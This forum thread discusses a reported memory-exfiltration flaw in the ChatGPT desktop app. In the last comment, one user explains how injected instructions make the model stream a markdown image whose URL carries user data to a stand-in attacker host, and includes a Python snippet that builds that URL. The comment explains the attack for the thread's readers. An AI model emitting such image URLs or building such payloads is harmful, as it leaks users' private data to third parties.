• jaybone@lemmy.world · 13 minutes ago

    How is the application able to send data to any website? Like, how would it even do that if you, the legit user, explicitly asked it to?

  • idiomaddict@lemmy.world · 1 hour ago

    I don’t know anything about tech, so please bear with your mom’s work friend (me) being ignorant about technology for a second.

    I thought the whole issue with generative ai as it stands was that it’s equally confident in truth and nonsense, with no way to distinguish the two. Is there actually a way to get it to “remember” true things and not just make up things that seem like they could be true?

    • MartianSands@sh.itjust.works · 40 minutes ago

      No, basically. They would love to be able to do that, but it’s approximately impossible for the generative systems they’re using at the moment.

  • Eager Eagle@lemmy.world · 5 hours ago (edited)

    tl;dr

    • it affects the ChatGPT desktop app, and likely any client that offers the long-term memory feature.
    • does not apply to the web interface.
    • does not apply to API access.
    • the data exfiltration is visible to the user: ChatGPT streams the tokens that form the exfiltration URL as a (fake) markdown image.
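    The last bullet describes exfiltration through a rendered markdown image: the model is tricked into emitting an image whose URL carries the stolen data as a query parameter, so the client leaks it just by fetching the image. A minimal sketch of how such a payload is built (the attacker host and parameter name here are made up, not the ones from the actual report):

    ```python
    from urllib.parse import quote

    # Hypothetical attacker endpoint, for illustration only.
    ATTACKER_HOST = "https://attacker.example/collect"

    def exfil_markdown_image(secret: str) -> str:
        """Build a markdown image whose URL smuggles `secret` as a query
        parameter. If a chat client auto-renders this markdown, it fetches
        the image URL and delivers the secret to the attacker's server
        without the user clicking anything."""
        return f"![loading]({ATTACKER_HOST}?q={quote(secret)})"

    print(exfil_markdown_image("user's saved memory: lives in Berlin"))
    ```

    This is why the leak is technically "visible": the URL is streamed into the chat as ordinary tokens, but it looks like a broken or loading image rather than stolen data.
    
    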